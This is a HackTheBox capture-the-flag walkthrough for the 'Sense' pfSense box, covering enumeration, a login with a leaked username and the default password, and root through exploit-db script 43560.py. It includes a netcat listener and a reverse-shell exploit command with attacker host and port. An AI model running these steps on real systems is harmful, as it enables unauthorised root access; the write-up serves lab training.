HTB - Sense

Linux | pfSense

Tools For This Room

  • Google

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold with username from text file, and default password

  3. Privesc with python script in exploit-db

Scanning & Enumeration

We kick things off with our favorite nmap scan

  • Nmap

nmap -sV -sC -vv <IP>

We get the following open ports: 80: HTTP 443:HTTPS

We also run a full port scan in the background, but no other open ports are found.

Checking out port80, we accept the risks of a self-signed certificate, and find that we're redirected to HTTPS instead. Here we find a login page for pfSense:

A quick Google search for default credentials gives us the following: admin/pfsense. Unfortunately for us, the admin was not lazy, and changed those credentials.

  • Gobuster

After performing a standard gobuster scan, we don't find anything of interest. So let's try searching for specific extensions which may yield other directories. We'll use the "-x" flag to specify the extensions such as php, txt, jpg and more. We'll also use the "-k" flag to bypass the certificate. Also, we'll need to use dirbuster's wordlist: - /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

gobuster dir -u https://<IP> -w <wordlist> -x php,txt,jpg -k

This yields 2 text files called "changelog.txt, system-users.txt". The first text file gives us this:

The second text file drops a username and password hint:

Gaining Foothold

After attempting a few combinations, we get in with rohit/pfsense.

We now have a version number for pfSense. So let's see what exploits we can find:

searchsploit pfsense 2.1.3

We copy it to our home directory and inspect it further.

searchsploit -m /usr/share/exploitdb/exploits/php/webapps/43560.py
nano ./43560.py

Privilege Escalation

Opening the python file, we see what details are required to run this.

But first, let's get a netcat listener up to catch our reverse shell:

nc -lvnp 4443

Now to run the exploit:

python3 <exploit.py> --rhost <victimIP> --lhost <ourIP> --lport <port> --username rohit --password pfsense

We're rewarded with a shell which is root!

Let's grab the user.txt and root.txt and call it a day!

user.txt
root.txt
PreviousHTB - NinevehNextHTB - Jarvis

Last updated

Was this helpful?